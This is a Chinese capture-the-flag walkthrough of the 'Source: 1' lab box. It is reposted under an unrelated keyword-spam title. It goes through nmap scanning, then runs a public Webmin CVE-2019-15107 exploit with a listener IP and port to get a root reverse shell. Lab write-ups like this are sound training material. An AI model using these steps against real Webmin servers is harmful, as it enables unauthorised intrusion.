当前位置: 首页> 新闻> 资讯 > 设计制作小车视频_项目网站有哪些_精准客户资源购买_百度app下载官方免费下载最新版

设计制作小车视频_项目网站有哪些_精准客户资源购买_百度app下载官方免费下载最新版

时间:2025/9/11 5:18:13来源:https://blog.csdn.net/m0_74786138/article/details/146189753 浏览次数:1次
设计制作小车视频_项目网站有哪些_精准客户资源购买_百度app下载官方免费下载最新版

目录标题

  • 一、靶机搭建
  • 二、信息收集
    • 官方信息
    • 扫ip
    • 扫开放服务和端口
    • 指纹探测
    • 目录扫描
  • 三、Web渗渗透
    • CVE-2019-15107-Webmin远程命令执行漏洞
  • 四、提权

一、靶机搭建

选择打开选项

选中下载的ova文件,然后导入选择一个存放路径即可

如果遇到不兼容的情况,可以打开**.vmx**修改,改为和虚拟机一个版本号

二、信息收集

官方信息

Name: Source: 1
Date release: 17 Jul 2020
难度:初级
描述:为 AttackerKB 聊天室创建的简单 CTF 盒子。这是练习的独立版本。这个框可能会出现在供应链攻击的后续房间里,因为它是一个很好的最新例子。

扫ip

靶机ip:192.168.108.154

扫开放服务和端口

开放了22和10000端口

指纹探测

nmap 192.168.108.154 -p 22,10000 -sV -sC -O --version-all 

没什么可以利用的信息,看到10000端口版本信息,MiniServ 1.890 (Webmin httpd)

目录扫描

dirsearch扫描看看,扫不出来

dirb扫描,无结果

三、Web渗渗透

访问10000端口,是一个登录网站,源码和指纹信息都没有什么利用点

想到刚才找到的网站版本号,查找一下历史漏洞

下载下来查看一下,需要结合msf才能使用

CVE-2019-15107-Webmin远程命令执行漏洞

上网搜一下看看,存在漏洞,参考文章:

https://github.com/squid22/Webmin_CVE-2019-15107
https://github.com/jas502n/CVE-2019-15107?tab=readme-ov-file

下载exp到kali

四、提权

赋予权限

开启监听端口,并执行脚本

./webmin_exploit.py 192.168.108.154 10000 192.168.108.130 4444

拿到root权限

在跟目录下发现flag

flag:THM{UPDATE_YOUR_INSTALL}

关键字:设计制作小车视频_项目网站有哪些_精准客户资源购买_百度app下载官方免费下载最新版

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: